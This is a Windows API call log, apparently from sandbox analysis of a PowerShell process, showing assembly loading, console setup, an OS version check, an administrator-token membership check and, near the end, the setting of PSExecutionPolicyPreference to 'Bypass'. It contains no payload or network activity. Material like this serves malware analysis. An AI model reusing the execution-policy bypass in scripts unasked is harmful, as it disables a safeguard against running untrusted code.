	[0065.691] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d9c8 | out: phkResult=0x27d9c8*=0x310) returned 0x0
	[0065.695] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d90c, lpData=0x0, lpcbData=0x27d908*=0x0 | out: lpType=0x27d90c*=0x1, lpData=0x0, lpcbData=0x27d908*=0x56) returned 0x0
	[0065.696] CoTaskMemAlloc (cb=0x5a) returned 0x555970
	[0065.696] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d8dc, lpData=0x555970, lpcbData=0x27d8d8*=0x56 | out: lpType=0x27d8dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d8d8*=0x56) returned 0x0
	[0065.696] CoTaskMemFree (pv=0x555970) 
	[0065.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.802] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.802] CoTaskMemFree (pv=0x506ba0) 
	[0068.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0068.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0069.634] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0069.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.634] CoTaskMemFree (pv=0x506cb0) 
	[0069.635] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0069.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.635] CoTaskMemFree (pv=0x506cb0) 
	[0070.011] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0070.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.011] CoTaskMemFree (pv=0x506cb0) 
	[0070.012] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0070.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.013] CoTaskMemFree (pv=0x506cb0) 
	[0070.013] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0070.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.013] CoTaskMemFree (pv=0x506cb0) 
	[0071.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.926] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0071.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0071.926] CoTaskMemFree (pv=0x506cb0) 
	[0073.016] CoTaskMemAlloc (cb=0x104) returned 0x506cb0
	[0073.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0073.016] CoTaskMemFree (pv=0x506cb0) 
	[0073.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0073.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0085.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0085.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0095.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0099.789] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0099.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.789] CoTaskMemFree (pv=0x506ed0) 
	[0099.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.748] bsearch (_Key=0x27ae80, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.769] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0107.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.769] CoTaskMemFree (pv=0x506ed0) 
	[0107.772] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0107.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.772] CoTaskMemFree (pv=0x506ed0) 
	[0107.773] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0107.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.773] CoTaskMemFree (pv=0x506ed0) 
	[0107.775] CoCreateGuid (in: pguid=0x27dc68 | out: pguid=0x27dc68*(Data1=0xcfe54a5e, Data2=0x7311, Data3=0x46af, Data4=([0]=0x81, [1]=0xbe, [2]=0xa3, [3]=0x2a, [4]=0xac, [5]=0xda, [6]=0x8e, [7]=0x43))) returned 0x0
	[0108.230] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0108.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.231] CoTaskMemFree (pv=0x506ed0) 
	[0108.234] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0108.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.234] CoTaskMemFree (pv=0x506ed0) 
	[0108.632] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0108.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.632] CoTaskMemFree (pv=0x506ed0) 
	[0108.638] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0108.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x27d910 | out: lpConsoleScreenBufferInfo=0x27d910) returned 1
	[0108.644] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0108.644] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x27d910 | out: lpConsoleScreenBufferInfo=0x27d910) returned 1
	[0108.645] GetVersionExW (in: lpVersionInformation=0x27d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0108.648] GetCurrentProcess () returned 0xffffffffffffffff
	[0108.648] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x27d938 | out: TokenHandle=0x27d938*=0x1d0) returned 1
	[0108.652] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27d858 | out: TokenInformation=0x0, ReturnLength=0x27d858) returned 0
	[0108.653] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b38c0
	[0108.653] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x4b38c0, TokenInformationLength=0x4, ReturnLength=0x27d858 | out: TokenInformation=0x4b38c0, ReturnLength=0x27d858) returned 1
	[0108.657] DuplicateTokenEx (in: hExistingToken=0x1d0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x27d9b8 | out: phNewToken=0x27d9b8*=0x1c8) returned 1
	[0108.658] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27d858 | out: TokenInformation=0x0, ReturnLength=0x27d858) returned 0
	[0108.659] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b3af0
	[0108.659] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x4b3af0, TokenInformationLength=0x4, ReturnLength=0x27d858 | out: TokenInformation=0x4b3af0, ReturnLength=0x27d858) returned 1
	[0108.660] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2dbbd28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x27d9c8 | out: IsMember=0x27d9c8) returned 1
	[0108.660] CloseHandle (hObject=0x1c8) returned 1
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.675] GetConsoleWindow () returned 0x401f6
	[0136.705] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0137.023] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0137.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.024] CoTaskMemFree (pv=0x506ed0) 
	[0137.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
